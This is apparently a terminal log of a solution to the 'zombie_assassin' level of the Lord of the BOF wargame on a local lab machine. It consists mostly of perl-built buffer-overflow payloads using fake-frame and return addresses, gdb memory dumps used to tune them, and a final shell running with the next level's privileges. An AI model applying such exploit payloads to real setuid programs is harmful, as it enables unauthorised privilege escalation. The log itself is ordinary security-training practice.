Xshell 4 (Build 0127)
Copyright (c) 2002-2013 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
Xshell:\>

Connecting to 192.168.232.128:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
                                            _______________________
  _______________________-------------------                       `\
/:--__                                                              |
||< > |                                   ___________________________/
| \__/_________________-------------------                         |
|                                                                  |
|        The Lord of the BOF : The Fellowship of the BOF, 2010    |
|                                                                  |
|                                                                  |
  |       [enter to the dungeon]                                    |
  |       gate : gate                                                |
  |                                                                  |
  |       [RULE]                                                     |
   |      - do not use local root exploit                             |
   |      - do not use LD_PRELOAD to my-pass                          |
   |      - do not use single boot                    [h4ck3rsch001] |
  |                                              ____________________|_
  |  ___________________-------------------------                      `\
  |/`--_                                                                 |
  ||[ ]||                                            ___________________/
   \===/___________________--------------------------


login: assassin
Password:
Last login: Fri Sep  6 14:24:49 from 192.168.232.1
[assassin@localhost assassin]$ bash2                         
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ ls
core  fs  fs.c  zombie_assassin
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵?.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x0 in ?? ()
(gdb) x/1000s 0xbffffb00
0xbffffb00:     "\225?엔?풾??205?엔?옇?왠?욍?웡??016?026???풪?퓀?오왔?
0xbffffb51:     ""
0xbffffb52:     ""
0xbffffb53:     ""
0xbffffb54:     "\003"
0xbffffb56:     ""
0xbffffb57:     ""
0xbffffb58:     "4\200\004\b\004"
0xbffffb5e:     ""
0xbffffb5f:     ""
0xbffffb60:     " "
0xbffffb62:     ""
0xbffffb63:     ""
0xbffffb64:     "\005"
0xbffffb66:     ""
0xbffffb67:     ""
0xbffffb68:     "\006"
0xbffffb6a:     ""
0xbffffb6b:     ""
0xbffffb6c:     "\006"
0xbffffb6e:     ""
0xbffffb6f:     ""
0xbffffb70:     ""
0xbffffb71:     "\020"
0xbffffb73:     ""
0xbffffb74:     "\a"
0xbffffb76:     ""
0xbffffb77:     ""
0xbffffb78:     ""
0xbffffb79:     ""
---Type <return> to continue, or q <return> to quit---
0xbffffb7a:     ""
0xbffffb7b:     "@\b"
0xbffffb7e:     ""
0xbffffb7f:     ""
0xbffffb80:     ""
0xbffffb81:     ""
0xbffffb82:     ""
0xbffffb83:     ""
0xbffffb84:     "\t"
0xbffffb86:     ""
0xbffffb87:     ""
0xbffffb88:     "\220\203\004\b\013"
0xbffffb8e:     ""
0xbffffb8f:     ""
0xbffffb90:     "\003\002"
0xbffffb93:     ""
0xbffffb94:     "\f"
0xbffffb96:     ""
0xbffffb97:     ""
0xbffffb98:     "\003\002"
0xbffffb9b:     ""
0xbffffb9c:     "\r"
0xbffffb9e:     ""
0xbffffb9f:     ""
0xbffffba0:     "\003\002"
0xbffffba3:     ""
0xbffffba4:     "\016"
0xbffffba6:     ""
0xbffffba7:     ""
0xbffffba8:     "\003\002"
---Type <return> to continue, or q <return> to quit---
0xbffffbab:     ""
0xbffffbac:     "\020"
0xbffffbae:     ""
0xbffffbaf:     ""
0xbffffbb0:     "魂\017\017"
0xbffffbb6:     ""
0xbffffbb7:     ""
0xbffffbb8:     "珹?
0xbffffbbd:     ""
0xbffffbbe:     ""
0xbffffbbf:     ""
0xbffffbc0:     ""
0xbffffbc1:     ""
0xbffffbc2:     ""
0xbffffbc3:     ""
0xbffffbc4:     ""
0xbffffbc5:     ""
0xbffffbc6:     ""
0xbffffbc7:     ""
0xbffffbc8:     ""
0xbffffbc9:     ""
0xbffffbca:     ""
0xbffffbcb:     ""
0xbffffbcc:     ""
0xbffffbcd:     ""
0xbffffbce:     ""
0xbffffbcf:     ""
0xbffffbd0:     ""
0xbffffbd1:     ""
0xbffffbd2:     ""
---Type <return> to continue, or q <return> to quit---
0xbffffbd3:     ""
0xbffffbd4:     ""
0xbffffbd5:     ""
0xbffffbd6:     ""
0xbffffbd7:     ""
0xbffffbd8:     ""
0xbffffbd9:     ""
0xbffffbda:     ""
0xbffffbdb:     ""
0xbffffbdc:     ""
0xbffffbdd:     ""
0xbffffbde:     ""
0xbffffbdf:     ""
0xbffffbe0:     "i686"
0xbffffbe5:     "./zombie_assassin"
0xbffffbf7:     "aaaa?212\005@bbbb廈\017@", 'b' <repeats 24 times>, "釵?
0xbffffc24:     "PWD=/home/assassin/tmp"
0xbffffc3b:     "REMOTEHOST=192.168.232.1"
0xbffffc54:     "HOSTNAME=localhost.localdomain"
0xbffffc73:     "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffc95:     "USER=assassin"
0xbffffca3:     "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffd6b:     ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbffffe33:     "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbffffe66:     "MACHTYPE=i386-redhat-linux-gnu"
0xbffffe85:     "MAIL=/var/spool/mail/assassin"
0xbffffea3:     "INPUTRC=/etc/inputrc"
0xbffffeb8:     "BASH_ENV=/home/assassin/.bashrc"
---Type <return> to continue, or q <return> to quit---ㅂ
0xbffffed8:     "LANG=en_US"
0xbffffee3:     "DISPLAY=192.168.232.1:0.0"
0xbffffefd:     "LOGNAME=assassin"
0xbfffff0e:     "SHLVL=2"
0xbfffff16:     "USERNAME="
0xbfffff20:     "SHELL=/bin/bash"
0xbfffff30:     "HOSTTYPE=i386"
0xbfffff3e:     "HISTSIZE=1000"
0xbfffff4c:     "OSTYPE=linux-gnu"
0xbfffff5d:     "TERM=xterm"
0xbfffff68:     "HOME=/home/assassin"
0xbfffff7c:     "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/assassin/bin"
0xbfffffc0:     "_=./zombie_assassin"
0xbfffffd4:     "OLDPWD=/home/assassin"
0xbfffffea:     "./zombie_assassin"
0xbffffffc:     ""
0xbffffffd:     ""
0xbffffffe:     ""
0xbfffffff:     ""
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/100x 0xbfffffb7
0xbfffffb7:     0x6e697373     0x6e69622f     0x2e3d5f00     0x6d6f7a2f
0xbfffffc7:     0x5f656962     0x61737361     0x6e697373     0x444c4f00
0xbfffffd7:     0x3d445750     0x6d6f682f     0x73612f65     0x73736173
0xbfffffe7:     0x2e006e69     0x6d6f7a2f     0x5f656962     0x61737361
0xbffffff7:     0x6e697373     0x00000000     Cannot access memory at address 0xbfffffff
(gdb) x/100x 0xbffffbf7
0xbffffbf7:     0x61616161     0x40058ae0     0x62626262     0x400fbff9
0xbffffc07:     0x62626262     0x62626262     0x62626262     0x62626262
0xbffffc17:     0x62626262     0x62626262     0xbffffbf3     0x44575000
0xbffffc27:     0x6f682f3d     0x612f656d     0x73617373     0x2f6e6973
0xbffffc37:     0x00706d74     0x4f4d4552     0x4f484554     0x313d5453
0xbffffc47:     0x312e3239     0x322e3836     0x312e3233     0x534f4800
0xbffffc57:     0x4d414e54     0x6f6c3d45     0x686c6163     0x2e74736f
0xbffffc67:     0x61636f6c     0x6d6f646c     0x006e6961     0x5353454c
0xbffffc77:     0x4e45504f     0x752f7c3d     0x622f7273     0x6c2f6e69
0xbffffc87:     0x70737365     0x2e657069     0x25206873     0x53550073
0xbffffc97:     0x613d5245     0x73617373     0x006e6973     0x435f534c
0xbffffca7:     0x524f4c4f     0x6f6e3d53     0x3a30303d     0x303d6966
0xbffffcb7:     0x69643a30     0x3b31303d     0x6c3a3433     0x31303d6e
0xbffffcc7:     0x3a36333b     0x343d6970     0x33333b30     0x3d6f733a
0xbffffcd7:     0x333b3130     0x64623a35     0x3b30343d     0x303b3333
0xbffffce7:     0x64633a31     0x3b30343d     0x303b3333     0x726f3a31
0xbffffcf7:     0x3b31303d     0x333b3530     0x31343b37     0x3d696d3a
0xbffffd07:     0x303b3130     0x37333b35     0x3a31343b     0x303d7865
0xbffffd17:     0x32333b31     0x632e2a3a     0x303d646d     0x32333b31
0xbffffd27:     0x652e2a3a     0x303d6578     0x32333b31     0x632e2a3a
0xbffffd37:     0x303d6d6f     0x32333b31     0x622e2a3a     0x303d6d74
0xbffffd47:     0x32333b31     0x622e2a3a     0x303d7461     0x32333b31
0xbffffd57:     0x732e2a3a     0x31303d68     0x3a32333b     0x73632e2a
0xbffffd67:     0x31303d68     0x3a32333b     0x61742e2a     0x31303d72
0xbffffd77:     0x3a31333b     0x67742e2a     0x31303d7a     0x3a31333b
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf7\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?
Segmentation fault (core dumped)
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x62626262 in ?? ()
(gdb) q    
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ exit 
exit
Segmentation fault (core dumped)
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ Xq   
sh: Xq: command not found
bash$ exit
exit
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `                  aaaaaaaabbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x62626262 in ?? ()
(gdb) x/100x 0xbffffbf3
0xbffffbf3:     0x61616161     0x61616161     0x62626262     0x400fbff9
0xbffffc03:     0x62626262     0x62626262     0x62626262     0x62626262
0xbffffc13:     0x62626262     0x62626262     0xbffffbf3     0x080484df
0xbffffc23:     0x44575000     0x6f682f3d     0x612f656d     0x73617373
0xbffffc33:     0x2f6e6973     0x00706d74     0x4f4d4552     0x4f484554
0xbffffc43:     0x313d5453     0x312e3239     0x322e3836     0x312e3233
0xbffffc53:     0x534f4800     0x4d414e54     0x6f6c3d45     0x686c6163
0xbffffc63:     0x2e74736f     0x61636f6c     0x6d6f646c     0x006e6961
0xbffffc73:     0x5353454c     0x4e45504f     0x752f7c3d     0x622f7273
0xbffffc83:     0x6c2f6e69     0x70737365     0x2e657069     0x25206873
0xbffffc93:     0x53550073     0x613d5245     0x73617373     0x006e6973
0xbffffca3:     0x435f534c     0x524f4c4f     0x6f6e3d53     0x3a30303d
0xbffffcb3:     0x303d6966     0x69643a30     0x3b31303d     0x6c3a3433
0xbffffcc3:     0x31303d6e     0x3a36333b     0x343d6970     0x33333b30
0xbffffcd3:     0x3d6f733a     0x333b3130     0x64623a35     0x3b30343d
0xbffffce3:     0x303b3333     0x64633a31     0x3b30343d     0x303b3333
0xbffffcf3:     0x726f3a31     0x3b31303d     0x333b3530     0x31343b37
0xbffffd03:     0x3d696d3a     0x303b3130     0x37333b35     0x3a31343b
0xbffffd13:     0x303d7865     0x32333b31     0x632e2a3a     0x303d646d
0xbffffd23:     0x32333b31     0x652e2a3a     0x303d6578     0x32333b31
0xbffffd33:     0x632e2a3a     0x303d6d6f     0x32333b31     0x622e2a3a
0xbffffd43:     0x303d6d74     0x32333b31     0x622e2a3a     0x303d7461
0xbffffd53:     0x32333b31     0x732e2a3a     0x31303d68     0x3a32333b
0xbffffd63:     0x73632e2a     0x31303d68     0x3a32333b     0x61742e2a
0xbffffd73:     0x31303d72     0x3a31333b     0x67742e2a     0x31303d7a
(gdb) x/x 0xbffffbf3
0xbffffbf3:     0x61616161
(gdb)
0xbffffbf7:     0x61616161
(gdb)
0xbffffbfb:     0x62626262
(gdb)
0xbffffbff:     0x400fbff9
(gdb) x/x 0xbffffbf3+4
0xbffffbf7:     0x61616161
(gdb)
0xbffffbfb:     0x62626262
(gdb)
0xbffffbff:     0x400fbff9
(gdb)
0xbffffc03:     0x62626262
(gdb) q  
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ id   
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$


Posted by windowhan